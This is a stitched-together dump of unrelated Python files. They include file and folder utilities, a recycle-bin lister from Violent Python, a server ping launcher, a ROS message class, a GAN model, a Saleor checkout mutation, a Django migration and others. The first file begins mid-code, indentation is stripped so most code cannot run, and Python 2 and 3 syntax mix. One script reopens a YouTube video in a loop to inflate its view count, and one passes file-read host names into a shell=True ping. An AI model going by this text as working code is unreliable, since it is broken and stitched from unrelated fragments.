'f_ct' : time.strftime("%d/%m/%Y %I:%M:%S %p",
time.localtime(file_stats[stat.ST_CTIME]))
}
print ("\nfile name = %(fname)s", file_info)
print ("file size = %(fsize)s bytes", file_info)
print ("last modified = %(f_lm)s", file_info)
print ("last accessed = %(f_la)s", file_info)
print ("creation time = %(f_ct)s\n", file_info)
if stat.S_ISDIR(file_stats[stat.ST_MODE]):
print ("This a directory")
else:
print ("This is not a directory\n")
print ("A closer look at the os.stat(%s) tuple:" % file_name)
print (file_stats)
print ("\nThe above tuple has the following sequence:")
print ("""st_mode (protection bits), st_ino (inode number),
st_dev (device), st_nlink (number of hard links),
st_uid (user ID of owner), st_gid (group ID of owner),
st_size (file size, bytes), st_atime (last access time, seconds since epoch),
st_mtime (last modification time), st_ctime (time of creation, Windows)"""
)
# Script Name : dir_test.py
# Author : Craig Richards
# Created : 29th November 2011
# Last Modified :
# Version : 1.0
# Modifications :
# Description : Tests to see if the directory testdir exists, if not it will create the directory for you
import os # Import the OS module
if not os.path.exists('testdir'): # Check to see if it exists
os.makedirs('testdir') # Create the directory
import time
import webbrowser
#how much views you want
#This only works when video has less than 300 views, it won't work when there are more than 300 views...
#due to youtube's policy.
print("Enjoy your Time\n" + time.ctime())
for count in range(30):
time.sleep(5)
webbrowser.open("https://www.youtube.com/watch?v=o6A7nf3IeeA")
# batch_file_rename.py
# Created: 6th August 2012
'''
This will batch rename a group of files in a given directory,
once you pass the current and new extensions
'''
__author__ = 'Craig Richards'
__version__ = '1.0'
import os
import sys
def batch_rename(work_dir, old_ext, new_ext):
'''
This will batch rename a group of files in a given directory,
once you pass the current and new extensions
'''
# files = os.listdir(work_dir)
for filename in os.listdir(work_dir):
# Get the file extension
file_ext = os.path.splitext(filename)[1]
# Start of the logic to check the file extensions, if old_ext = file_ext
if old_ext == file_ext:
# Set newfile to be the filename, replaced with the new extension
newfile = filename.replace(old_ext, new_ext)
# Write the files
os.rename(
os.path.join(work_dir, filename),
os.path.join(work_dir, newfile)
)
def main():
'''
This will be called if the script is directly invoked.
'''
# Set the variable work_dir with the first argument passed
work_dir = sys.argv[1]
# Set the variable old_ext with the second argument passed
old_ext = sys.argv[2]
# Set the variable new_ext with the third argument passed
new_ext = sys.argv[3]
batch_rename(work_dir, old_ext, new_ext)
if __name__ == '__main__':
main()
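# Example invocation (hypothetical directory and extensions):
#   python batch_file_rename.py ./photos .jpeg .jpg
# renames every *.jpeg directly inside ./photos to *.jpg.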
# Script Name : recyclebin.py
# Author : Craig Richards
# Created : 07th June 2013
# Last Modified :
# Version : 1.0
# Modifications :
# Description : Scans the recyclebin and displays the files in there, originally got this script from the Violent Python book
import os # Load the Module
import optparse # Load the Module
from _winreg import * # Load the Module
def sid2user(sid): # Start of the function to gather the user
try:
key = OpenKey(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProfileList" + '\\' + sid)
(value, type) = QueryValueEx(key, 'ProfileImagePath')
user = value.split('\\')[-1]
return user
except:
return sid
def returnDir(): # Start of the function to search through the recyclebin
dirs=['c:\\Recycler\\','C:\\Recycled\\','C:\\$RECYCLE.BIN\\']
#dirs=['c:\\$RECYCLE.BIN\\']
for recycleDir in dirs:
if os.path.isdir(recycleDir):
return recycleDir
return None
def findRecycled(recycleDir): # Start of the function, list the contents of the recyclebin
dirList = os.listdir(recycleDir)
for sid in dirList:
files = os.listdir(recycleDir + sid)
user = sid2user(sid)
print '\n[*] Listing Files for User: ' + str(user)
for file in files:
print '[+] Found File: ' + str(file)
def main():
recycleDir = returnDir()
if recycleDir is None: # returnDir gives None when no recycle bin directory exists
print '[-] No recycle bin directory found'
return
findRecycled(recycleDir)
if __name__ == '__main__':
main()
# Script Name : powerdown_startup.py
# Author : Craig Richards
# Created : 05th January 2012
# Last Modified :
# Version : 1.0
# Modifications :
# Description : This goes through the server list and pings the machine, if it's up it will load the putty session, if its not it will notify you.
import os # Load the Library Module
import subprocess # Load the Library Module
from time import strftime # Load just the strftime Module from Time
def windows(): # This is the function to run if it detects the OS is windows.
f = open('server_startup_'+strftime("%Y-%m-%d")+'.log', 'a') # Open the logfile
for server in open('startup_list.txt','r'): # Read the list of servers from the list
ret = subprocess.call("ping -n 3 %s" % server, shell=True,stdout=open('NUL', 'w'),stderr=subprocess.STDOUT) # Ping the servers in turn
if ret == 0: # If you get a response.
f.write ("%s: is alive, loading PuTTY session" % server.strip() + "\n") # Write out to the logfile
subprocess.Popen(('putty -load '+server)) # Load the putty session
else:
f.write ("%s : did not respond" % server.strip() + "\n") # Write to the logfile if the server is down
def linux():
f = open('server_startup_'+strftime("%Y-%m-%d")+'.log', 'a') # Open the logfile
for server in open('startup_list.txt'): # Read the list of servers from the list
ret = subprocess.call("ping -c 3 %s" % server, shell=True,stdout=open('/dev/null', 'w'),stderr=subprocess.STDOUT) # Ping the servers in turn
if ret == 0: # If you get a response.
f.write ("%s: is alive" % server.strip() + "\n") # Print a message
subprocess.Popen(['ssh', server.strip()])
else:
f.write ("%s: did not respond" % server.strip() + "\n")
# End of the functions
# Start of the Main Program
if os.name == "posix": # If the OS is linux...
linux() # Call the linux function
elif os.name in ("nt", "dos", "ce"): # If the OS is Windows...
windows() # Call the windows function
import SimpleHTTPServer
import SocketServer
PORT = 8000 # This will serve at port 8000
Handler = SimpleHTTPServer.SimpleHTTPRequestHandler
httpd = SocketServer.TCPServer(("", PORT), Handler)
print "serving at port", PORT
httpd.serve_forever()
# Script Name : folder_size.py
# Author : Craig Richards
# Created : 19th July 2012
# Last Modified : 22 February 2016
# Version : 1.0.1
# Modifications : Modified the Printing method and added a few comments
# Description : This will scan the current directory and all subdirectories and display the size.
import os
import sys # Load the sys module for the argument vector
try:
directory = sys.argv[1] # Set the variable directory to be the argument supplied by user.
except IndexError:
sys.exit("Must provide an argument.")
dir_size = 0 # Set the size to 0
fsizedicr = {'Bytes': 1,
'Kilobytes': float(1) / 1024,
'Megabytes': float(1) / (1024 * 1024),
'Gigabytes': float(1) / (1024 * 1024
* 1024)}
for (path, dirs, files) in os.walk(directory): # Walk through all the directories. For each iteration, os.walk returns the folders, subfolders and files in the dir.
for file in files: # Get all the files
filename = os.path.join(path, file)
dir_size += os.path.getsize(filename) # Add the size of each file in the root dir to get the total size.
fsizeList = [str(round(fsizedicr[key] * dir_size, 2)) + " " + key for key in fsizedicr] # List of units
if dir_size == 0: print ("File Empty") # Sanity check to eliminate corner-case of empty file.
else:
for units in sorted(fsizeList)[::-1]: # Reverse sort list of units so smallest magnitude units print first.
print ("Folder Size: " + units)# Script Name : env_check.py
# Author : Craig Richards
# Created : 14th May 2012
# Last Modified : 14 February 2016
# Version : 1.0.1
# Modifications : 1.0.1 - Tidy up comments and syntax
# Description : This script will check to see if all of the environment variables I require are set
import os
confdir = os.getenv("my_config") # Set the variable confdir from the OS environment variable
conffile = 'env_check.conf' # Set the variable conffile
conffilename = os.path.join(confdir, conffile) # Set the variable conffilename by joining confdir and conffile together
for env_check in open(conffilename): # Open the config file and read all the settings
env_check = env_check.strip() # Set the variable to itself, but strip the extra whitespace out
print '[{}]'.format(env_check) # Format the Output to be in Square Brackets
newenv = os.getenv(env_check) # Set the variable newenv to get the settings from the OS what is currently set for the settings out the configfile
if newenv is None: # If it doesn't exist
print env_check, 'is not set' # Print it is not set
else: # Else if it does exist
print 'Current Setting for {}={}\n'.format(env_check, newenv) # Print out the details
# Script Name : script_count.py
# Author : Craig Richards
# Created : 27th February 2012
# Last Modified : 20th July 2012
# Version : 1.3
# Modifications : 1.1 - 28-02-2012 - CR - Changed inside github and development functions, so instead of if os.name = "posix" do this else do this etc
# : I used os.path.join, so it condensed 4 lines down to 1
# : 1.2 - 10-05-2012 - CR - Added a line to include PHP scripts.
# : 1.3 - 20-07-2012 - CR - Added the line to include Batch scripts
# Description : This scans my scripts directory and gives a count of the different types of scripts
import os # Load the library module
path = os.getenv("scripts") # Set the variable path by getting the value from the OS environment variable scripts
dropbox = os.getenv("dropbox") # Set the variable dropbox by getting the value from the OS environment variable dropbox
def clear_screen(): # Function to clear the screen
if os.name == "posix": # Unix/Linux/MacOS/BSD/etc
os.system('clear') # Clear the Screen
elif os.name in ("nt", "dos", "ce"): # DOS/Windows
os.system('CLS') # Clear the Screen
def count_files(path, extensions): # Start of the function to count the files in the scripts directory, it counts the extension when passed below
counter = 0 # Set the counter to 0
for root, dirs, files in os.walk(path): # Loop through all the directories in the given path
for file in files: # For all the files
counter += file.endswith(extensions) # Count the files
return counter # Return the count
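# count_files matches with str.endswith, so a single extension or a tuple both
# work, e.g. count_files(path, '.py') or count_files(path, ('.sh', '.bash')).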
def github(): # Start of the function just to count the files in the github directory
github_dir = os.path.join(dropbox, 'github') # Joins the paths to get the github directory - 1.1
github_count = sum((len(f) for _, _, f in os.walk(github_dir))) # Get a count for all the files in the directory
if github_count > 5: # If the number of files is greater than 5, then print the following messages
print '\nYou have too many in here, start uploading !!!!!'
print 'You have: ' + str(github_count) + ' waiting to be uploaded to github!!'
elif github_count == 0: # Unless the count is 0, then print the following messages
print '\nGithub directory is all Clear'
else: # If it is any other number then print the following message, showing the number outstanding.
print '\nYou have: ' + str(github_count) + ' waiting to be uploaded to github!!'
def development(): # Start of the function just to count the files in the development directory
dev_dir = os.path.join(path, 'development') # Joins the paths to get the development directory - 1.1
dev_count = sum((len(f) for _, _, f in os.walk(dev_dir))) # Get a count for all the files in the directory
if dev_count > 10: # If the number of files is greater than 10, then print the following messages
print '\nYou have too many in here, finish them or delete them !!!!!'
print 'You have: ' + str(dev_count) + ' waiting to be finished!!'
elif dev_count ==0: # Unless the count is 0, then print the following messages
print '\nDevelopment directory is all clear'
else:
print '\nYou have: ' + str(dev_count) + ' waiting to be finished!!' # If it is any other number then print the following message, showing the number outstanding.
clear_screen() # Call the function to clear the screen
print '\nYou have the following :\n'
print 'AutoIT:\t' + str(count_files(path, '.au3')) # Run the count_files function to count the files with the extension we pass
print 'Batch:\t' + str(count_files(path, ('.bat', '.cmd'))) # 1.3
print 'Perl:\t' + str(count_files(path, '.pl'))
print 'PHP:\t' + str(count_files(path, '.php')) # 1.2
print 'Python:\t' + str(count_files(path, '.py'))
print 'Shell:\t' + str(count_files(path, ('.ksh', '.sh', '.bash')))
print 'SQL:\t' + str(count_files(path, '.sql'))
github() # Call the github function
development() # Call the development function
# Script Name : script_listing.py
# Author : Craig Richards
# Created : 15th February 2012
# Last Modified : 29th May 2012
# Version : 1.2
# Modifications : 1.1 - 28-02-2012 - CR - Added the variable to get the logs directory, I then joined the output so the file goes to the logs directory
# : 1.2 - 29-05-2012 - CR - Changed the line so it doesn't ask for a directory, it now uses the environment variable scripts
# Description : This will list all the files in the given directory, it will also go through all the subdirectories as well
import os # Load the library module
logdir = os.getenv("logs") # Set the variable logdir by getting the value from the OS environment variable logs
logfile = 'script_list.log' # Set the variable logfile
path = os.getenv("scripts") # Set the varable path by getting the value from the OS environment variable scripts - 1.2
#path = (raw_input("Enter dir: ")) # Ask the user for the directory to scan
logfilename = os.path.join(logdir, logfile) # Set the variable logfilename by joining logdir and logfile together
log = open(logfilename, 'w') # Set the variable log and open the logfile for writing
for dirpath, dirname, filenames in os.walk(path): # Go through the directories and the subdirectories
for filename in filenames: # Get all the filenames
log.write(os.path.join(dirpath, filename)+'\n') # Write the full path out to the logfile
print ("\nYour logfile " , logfilename, "has been created") # Small message informing the user the file has been createdimport numpy as np
import cv2
cap = cv2.VideoCapture(0)
while(True):
# Capture frame-by-frame
ret, frame = cap.read()
# Our operations on the frame come here
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
# Display the resulting frame
cv2.imshow('frame',gray)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
# When everything done, release the capture
cap.release()
cv2.destroyAllWindows()
#!/Users/silicon/Desktop/algo/courseEra1/bin/python3.5
# -*- coding: utf-8 -*-
import re
import sys
from pip import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
# generated from rosidl_generator_py/resource/_idl.py.em
# with input from geometry_msgs:msg\Quaternion.idl
# generated code does not contain a copyright notice
# Import statements for member types
import rosidl_parser.definition # noqa: E402, I100
class Metaclass_Quaternion(type):
"""Metaclass of message 'Quaternion'."""
_CREATE_ROS_MESSAGE = None
_CONVERT_FROM_PY = None
_CONVERT_TO_PY = None
_DESTROY_ROS_MESSAGE = None
_TYPE_SUPPORT = None
__constants = {
}
@classmethod
def __import_type_support__(cls):
try:
from rosidl_generator_py import import_type_support
module = import_type_support('geometry_msgs')
except ImportError:
import logging
import traceback
logger = logging.getLogger(
'geometry_msgs.msg.Quaternion')
logger.debug(
'Failed to import needed modules for type support:\n' +
traceback.format_exc())
else:
cls._CREATE_ROS_MESSAGE = module.create_ros_message_msg__msg__quaternion
cls._CONVERT_FROM_PY = module.convert_from_py_msg__msg__quaternion
cls._CONVERT_TO_PY = module.convert_to_py_msg__msg__quaternion
cls._TYPE_SUPPORT = module.type_support_msg__msg__quaternion
cls._DESTROY_ROS_MESSAGE = module.destroy_ros_message_msg__msg__quaternion
@classmethod
def __prepare__(cls, name, bases, **kwargs):
# list constant names here so that they appear in the help text of
# the message class under "Data and other attributes defined here:"
# as well as populate each message instance
return {
'X__DEFAULT': 0.0,
'Y__DEFAULT': 0.0,
'Z__DEFAULT': 0.0,
'W__DEFAULT': 1.0,
}
@property
def X__DEFAULT(cls):
"""Return default value for message field 'x'."""
return 0.0
@property
def Y__DEFAULT(cls):
"""Return default value for message field 'y'."""
return 0.0
@property
def Z__DEFAULT(cls):
"""Return default value for message field 'z'."""
return 0.0
@property
def W__DEFAULT(cls):
"""Return default value for message field 'w'."""
return 1.0
class Quaternion(metaclass=Metaclass_Quaternion):
"""Message class 'Quaternion'."""
__slots__ = [
'_x',
'_y',
'_z',
'_w',
]
_fields_and_field_types = {
'x': 'double',
'y': 'double',
'z': 'double',
'w': 'double',
}
SLOT_TYPES = (
rosidl_parser.definition.BasicType('double'), # noqa: E501
rosidl_parser.definition.BasicType('double'), # noqa: E501
rosidl_parser.definition.BasicType('double'), # noqa: E501
rosidl_parser.definition.BasicType('double'), # noqa: E501
)
def __init__(self, **kwargs):
assert all('_' + key in self.__slots__ for key in kwargs.keys()), \
'Invalid arguments passed to constructor: %s' % \
', '.join(sorted(k for k in kwargs.keys() if '_' + k not in self.__slots__))
self.x = kwargs.get(
'x', Quaternion.X__DEFAULT)
self.y = kwargs.get(
'y', Quaternion.Y__DEFAULT)
self.z = kwargs.get(
'z', Quaternion.Z__DEFAULT)
self.w = kwargs.get(
'w', Quaternion.W__DEFAULT)
def __repr__(self):
typename = self.__class__.__module__.split('.')
typename.pop()
typename.append(self.__class__.__name__)
args = []
for s, t in zip(self.__slots__, self.SLOT_TYPES):
field = getattr(self, s)
fieldstr = repr(field)
# We use Python array type for fields that can be directly stored
# in them, and "normal" sequences for everything else. If it is
# a type that we store in an array, strip off the 'array' portion.
if (
isinstance(t, rosidl_parser.definition.AbstractSequence) and
isinstance(t.value_type, rosidl_parser.definition.BasicType) and
t.value_type.typename in ['float', 'double', 'int8', 'uint8', 'int16', 'uint16', 'int32', 'uint32', 'int64', 'uint64']
):
if len(field) == 0:
fieldstr = '[]'
else:
assert fieldstr.startswith('array(')
prefix = "array('X', "
suffix = ')'
fieldstr = fieldstr[len(prefix):-len(suffix)]
args.append(s[1:] + '=' + fieldstr)
return '%s(%s)' % ('.'.join(typename), ', '.join(args))
def __eq__(self, other):
if not isinstance(other, self.__class__):
return False
if self.x != other.x:
return False
if self.y != other.y:
return False
if self.z != other.z:
return False
if self.w != other.w:
return False
return True
@classmethod
def get_fields_and_field_types(cls):
from copy import copy
return copy(cls._fields_and_field_types)
@property
def x(self):
"""Message field 'x'."""
return self._x
@x.setter
def x(self, value):
if __debug__:
assert \
isinstance(value, float), \
"The 'x' field must be of type 'float'"
self._x = value
@property
def y(self):
"""Message field 'y'."""
return self._y
@y.setter
def y(self, value):
if __debug__:
assert \
isinstance(value, float), \
"The 'y' field must be of type 'float'"
self._y = value
@property
def z(self):
"""Message field 'z'."""
return self._z
@z.setter
def z(self, value):
if __debug__:
assert \
isinstance(value, float), \
"The 'z' field must be of type 'float'"
self._z = value
@property
def w(self):
"""Message field 'w'."""
return self._w
@w.setter
def w(self, value):
if __debug__:
assert \
isinstance(value, float), \
"The 'w' field must be of type 'float'"
self._w = value
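# A minimal usage sketch (not part of the generated file): the defaults encode
# the identity rotation, so a default-constructed message equals an explicit one.
#   from geometry_msgs.msg import Quaternion
#   q = Quaternion(x=0.0, y=0.0, z=0.0, w=1.0)
#   assert q == Quaternion()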
import torch
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
__version__ = 205
# Number of wires in the CDC
n_wires = 3606
# Number of continuous features (E, t, dca)
n_features = 3
class Gen(nn.Module):
def __init__(self, ngf, latent_dims, seq_len, encoded_dim):
super().__init__()
self.ngf = ngf
self.seq_len = seq_len
self.version = __version__
# Input: (B, latent_dims, 1)
self.act = nn.ReLU()
self.lin0 = nn.Linear(latent_dims, seq_len//64*1024, bias=True)
class GBlock(nn.Module):
def __init__(self, in_channels, out_channels):
super().__init__()
self.convp = nn.ConvTranspose1d(in_channels, out_channels, 1, 1, 0)
self.convu = nn.ConvTranspose1d(in_channels, out_channels, 4, 2, 1)
self.conv1 = nn.ConvTranspose1d(out_channels, out_channels, 3, 1, 1)
self.bnu = nn.BatchNorm1d(out_channels)
self.bn1 = nn.BatchNorm1d(out_channels)
self.act = nn.ReLU()
def forward(self, x):
y0 = F.interpolate(self.convp(x), scale_factor=2, mode='nearest')
y = self.act(self.bnu(self.convu(x)))
y = self.act(y0 + self.bn1(self.conv1(y)))
return y
self.gb1 = GBlock(1024, 768)
self.gb2 = GBlock(768, 512)
self.gb3 = GBlock(512, 384)
self.gb4 = GBlock(384, 256)
self.gb5 = GBlock(256, 256)
self.gb6 = GBlock(256, 256)
self.convw1 = nn.ConvTranspose1d(256, 256, 3, 1, 1)
self.bnw1 = nn.InstanceNorm1d(256)
self.convw2 = nn.ConvTranspose1d(256, 256, 3, 1, 1)
self.bnw2 = nn.InstanceNorm1d(256)
self.convw3 = nn.ConvTranspose1d(256, n_wires, 3, 1, 1)
#self.bnp0 = nn.BatchNorm1d(n_wires)
self.convwp = nn.ConvTranspose1d(256, 64, 1, 1, 0)
self.convp1 = nn.ConvTranspose1d(2, 64, 3, 1, 1)
self.bnp1 = nn.BatchNorm1d(64)
self.convp2 = nn.ConvTranspose1d(64, 32, 3, 1, 1)
self.bnp2 = nn.BatchNorm1d(32)
self.convp3 = nn.ConvTranspose1d(32, n_features, 1, 1, 0)
self.out = nn.Tanh()
def forward(self, z, wire_to_xy):
# z: random point in latent space
x = self.act(self.lin0(z).view(-1, 1024, self.seq_len // 64))
x = self.gb1(x)
x = self.gb2(x)
x = self.gb3(x)
x = self.gb4(x)
x = self.gb5(x)
x = self.gb6(x)
w = self.bnw1(self.act(self.convw1(x)))
w = self.bnw2(self.act(self.convw2(w)))
w = self.convw3(w)
wg = F.gumbel_softmax(w, dim=1, hard=True, tau=2/3)
xy = torch.tensordot(wg, wire_to_xy, dims=[[1],[1]]).permute(0,2,1)
p = self.act(self.bnp1(self.convwp(x) + self.convp1(xy)))
p = self.act(self.bnp2(self.convp2(p)))
p = self.convp3(p)
return torch.cat([self.out(p), xy], dim=1), wg
class Disc(nn.Module):
def __init__(self, ndf, seq_len, encoded_dim):
super().__init__()
self.version = __version__
# (B, n_features, 256)
self.act = nn.LeakyReLU(0.2)
class DBlock(nn.Module):
def __init__(self, in_channels, out_channels):
super().__init__()
self.convd = nn.Conv1d(in_channels, out_channels, 4, 2, 1)
self.act = nn.LeakyReLU(0.2)
def forward(self, x):
y = self.act(self.convd(x))
return y
self.conv0 = nn.Conv1d(2, 64, 1, 1, 0)
self.conv1 = nn.Conv1d(64, 128, 1, 1, 0)
self.conv2 = nn.Conv1d(128, 256, 1, 1, 0)
self.conv3 = nn.Conv1d(256, 256, 1, 1, 0)
self.conv4 = nn.Conv1d(256, 256, 1, 1, 0)
#self.lin0 = nn.Linear(256 * seq_len // 1, 1, bias=True)
self.convf = nn.Conv1d(256, 1, 1, 1, 0)
self.out = nn.Identity()
def forward(self, x_):
# x_ is concatenated tensor of p_ and w_, shape (batch, features+n_wires, seq_len)
# p_ shape is (batch, features, seq_len),
# w_ is AE-encoded wire (batch, encoded_dim, seq_len)
seq_len = x_.shape[2]
x = x_
#dist = ((xy - nn.ConstantPad1d((1, 0), 0.0)(xy[:,:,:-1]))**2).sum(dim=1).unsqueeze(1)
p = x[:,:n_features]
w = x[:,n_features:]
#x = torch.cat([p, w], dim=1)
x = self.act(self.conv0(w))
x = self.act(self.conv1(x))
x = self.act(self.conv2(x))
x = self.act(self.conv3(x))
x = self.act(self.conv4(x))
#x = self.lin0(x.flatten(1,2))
x = self.convf(x)
x = x.mean(2)
return self.out(x)#.squeeze(1)
class VAE(nn.Module):
def __init__(self, encoded_dim):
super().__init__()
class Enc(nn.Module):
def __init__(self, hidden_size):
super().__init__()
self.act = nn.LeakyReLU(0.2)
self.lin1 = nn.Linear(n_wires, hidden_size)
self.lin2 = nn.Linear(hidden_size, encoded_dim)
self.out = nn.Tanh()
def forward(self, x):
x = self.act(self.lin1(x))
return self.out(self.lin2(x))
class Dec(nn.Module):
def __init__(self, hidden_size):
super().__init__()
self.act = nn.ReLU()
self.lin1 = nn.Linear(encoded_dim, hidden_size)
self.lin2 = nn.Linear(hidden_size, n_wires)
def forward(self, x):
x = self.act(self.lin1(x))
return self.lin2(x)
self.enc_net = Enc(512)
self.dec_net = Dec(512)
def enc(self, x):
return self.enc_net(x.permute(0, 2, 1)).permute(0,2,1)
def dec(self, x):
return self.dec_net(x.permute(0, 2, 1)).permute(0,2,1)
def forward(self, x):
y = self.dec_net(self.enc_net(x))
return y
def get_n_params(model):
return sum(p.reshape(-1).shape[0] for p in model.parameters())
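# A minimal smoke-test sketch (the sizes here are assumptions, not training
# settings; seq_len must be divisible by 64 for Gen's reshape/upsampling):
#   gen = Gen(ngf=16, latent_dims=256, seq_len=2048, encoded_dim=8)
#   disc = Disc(ndf=16, seq_len=2048, encoded_dim=8)
#   print(get_n_params(gen), get_n_params(disc))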
import graphene
from ....checkout.fetch import fetch_checkout_info, fetch_checkout_lines
from ....checkout.utils import invalidate_checkout_prices
from ....webhook.event_types import WebhookEventAsyncType
from ...core import ResolveInfo
from ...core.descriptions import ADDED_IN_34, DEPRECATED_IN_3X_INPUT
from ...core.doc_category import DOC_CATEGORY_CHECKOUT
from ...core.mutations import BaseMutation
from ...core.scalars import UUID
from ...core.types import CheckoutError
from ...core.utils import WebhookEventInfo
from ...plugins.dataloaders import get_plugin_manager_promise
from ..types import Checkout, CheckoutLine
from .utils import get_checkout, update_checkout_shipping_method_if_invalid
class CheckoutLineDelete(BaseMutation):
checkout = graphene.Field(Checkout, description="An updated checkout.")
class Arguments:
id = graphene.ID(
description="The checkout's ID." + ADDED_IN_34,
required=False,
)
token = UUID(
description=f"Checkout token.{DEPRECATED_IN_3X_INPUT} Use `id` instead.",
required=False,
)
checkout_id = graphene.ID(
required=False,
description=(
f"The ID of the checkout. {DEPRECATED_IN_3X_INPUT} Use `id` instead."
),
)
line_id = graphene.ID(description="ID of the checkout line to delete.")
class Meta:
description = "Deletes a CheckoutLine."
doc_category = DOC_CATEGORY_CHECKOUT
error_type_class = CheckoutError
error_type_field = "checkout_errors"
webhook_events_info = [
WebhookEventInfo(
type=WebhookEventAsyncType.CHECKOUT_UPDATED,
description="A checkout was updated.",
)
]
@classmethod
def perform_mutation( # type: ignore[override]
cls,
_root,
info: ResolveInfo,
/,
*,
checkout_id=None,
id=None,
line_id,
token=None,
):
checkout = get_checkout(cls, info, checkout_id=checkout_id, token=token, id=id)
line = cls.get_node_or_error(
info, line_id, only_type=CheckoutLine, field="line_id"
)
if line and line in checkout.lines.all():
line.delete()
manager = get_plugin_manager_promise(info.context).get()
lines, _ = fetch_checkout_lines(checkout)
checkout_info = fetch_checkout_info(checkout, lines, manager)
update_checkout_shipping_method_if_invalid(checkout_info, lines)
invalidate_checkout_prices(checkout_info, lines, manager, save=True)
cls.call_event(manager.checkout_updated, checkout)
return CheckoutLineDelete(checkout=checkout)
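# A hypothetical GraphQL document exercising this mutation (graphene exposes it
# in camelCase; the IDs below are made up):
#   mutation {
#     checkoutLineDelete(id: "Q2hlY2tvdXQ6MQ==", lineId: "Q2hlY2tvdXRMaW5lOjE=") {
#       checkout { id }
#       errors { field message }
#     }
#   }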
# Generated by Django 2.2 on 2021-07-11 20:46
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Show',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=255)),
('network', models.CharField(max_length=255)),
('release_date', models.DateTimeField()),
('desc', models.TextField()),
],
),
]
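# The models.py this migration was generated from would look roughly like the
# sketch below (reconstructed from the operations above, not from the repo):
#   from django.db import models
#   class Show(models.Model):
#       title = models.CharField(max_length=255)
#       network = models.CharField(max_length=255)
#       release_date = models.DateTimeField()
#       desc = models.TextField()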
#!/usr/bin/python
# Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
#
# TODO(50903): Delete the file in LayoutTests/bluetooth after all the tests have
# been migrated to this directory.
"""Test that the set of gen-* files is the same as the generated files."""
import fnmatch
import os
import sys
import generate
import logging
UPDATE_TIP = 'To update the generated tests, run:\n' \
'$ python third_party/WebKit/LayoutTests/bluetooth/generate.py'
def main():
logging.basicConfig(level=logging.INFO)
logging.info(UPDATE_TIP)
generated_files = set()
# Tests data in gen-* files is the same as the data generated.
for generated_test in generate.GetGeneratedTests():
generated_files.add(generated_test.path)
try:
with open(generated_test.path, 'r') as f:
data = f.read().decode('utf-8')
if data != generated_test.data:
logging.error('%s does not match template', generated_test.path)
return -1
except IOError, e:
if e.errno == 2:
logging.error('Missing generated test:\n%s\nFor template:\n%s',
generated_test.path,
generated_test.template)
return -1
# Tests that there are no obsolete generated files.
previous_generated_files = set()
current_path = os.path.dirname(os.path.realpath(__file__))
for root, _, filenames in os.walk(current_path):
for filename in fnmatch.filter(filenames, 'gen-*.https.html'):
previous_generated_files.add(os.path.join(root, filename))
if previous_generated_files != generated_files:
logging.error('There are extra generated tests. Please remove them.')
for test_path in previous_generated_files - generated_files:
logging.error('%s', test_path)
return -1
if __name__ == '__main__':
sys.exit(main())
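# Typically run from a source checkout, e.g. (path taken from this file's location):
#   python third_party/blink/web_tests/external/wpt/bluetooth/generate_test.py
# It exits non-zero when a gen-* file is stale, missing, or obsolete.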
# transform_expression.py
common_ends = {"+": "add", "-": "sub", "*": "mul", "/": "div"}
def function_is_present(function, scheme_expr):
for argument in scheme_expr:
if isinstance(argument, list):
if function_is_present(function, argument): # recurse into the sublist, and keep scanning the rest if nothing is found
return True
elif argument == function:
return True
def make_c_expr(scheme_expr):
# if not isinstance(scheme_expr[0], str):
# return scheme_expr # for lists
c_expr = scheme_expr.pop(0) + "("
cast_to_floats = False
for index, argument in enumerate(scheme_expr):
if isinstance(argument, list):
c_expr += make_c_expr(argument)
if index != len(scheme_expr) - 1:
c_expr += ", "
# print("C expression:", c_expr)
else:
if isinstance(argument, int) and cast_to_floats:
scheme_expr[index] = float(argument)
elif isinstance(argument, float):
cast_to_floats = True
c_expr += str(scheme_expr[index])
if index != len(scheme_expr) - 1:
c_expr += ", "
return c_expr + ")"
def make_float_funcs(scheme_expr):
for index, argument in enumerate(scheme_expr):
if (isinstance(argument, float) and scheme_expr[0] in common_ends.keys()) or scheme_expr[0] == "/":
return True
elif isinstance(argument, list):
if make_float_funcs(argument): # keep scanning the remaining arguments if this sublist has no floats
return True
return False
# applies only to built-in math functions that need va_args
def make_ints_to_doubles(scheme_expr):
for index, argument in enumerate(scheme_expr):
if index == 1:
continue
elif isinstance(argument, int):
scheme_expr[index] = float(argument) # still floating-point
elif isinstance(argument, list):
scheme_expr[index] = make_ints_to_doubles(argument)
return scheme_expr
def modify_operators(scheme_expr, make_float_operators):
for index, argument in enumerate(scheme_expr):
if isinstance(argument, list):
scheme_expr[index] = modify_operators(argument, make_float_operators)
elif index == 0 and (function := scheme_expr[0]) in common_ends.keys():
# modify the operators and make the arguments floats
scheme_expr[0] = common_ends[function]
if make_float_operators or function == "/":
make_ints_to_doubles(scheme_expr)
scheme_expr[0] += "_d"
return scheme_expr
if __name__ == "__main__":
# scheme_expr = ['define', 'f', ['lambda', ['x', 'y'], ['+', 'x', 'y', 1]]]
# scheme_expr = ['define', 'x', 5]
# scheme_expr = ['func', 5, ['*', 25, 14, ['/', 382, 90]]]
scheme_expr = ['define', 'x', 5]
scheme_expr = modify_operators(scheme_expr, make_float_funcs(scheme_expr))
c_expr = make_c_expr(scheme_expr)
print(c_expr)
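# For the demo input above, 'define' is not in common_ends, so nothing is
# renamed and the printed C expression is: define(x, 5)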
import errno
try:
fp = open( "NotAFile" )
fp.close()
except IOError as ex:
if ex.args[0] == errno.ENOENT:
print( "File not found!" )
else:
print( ex.args[0], ex.args[1] )
# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import contextlib
from .. import core
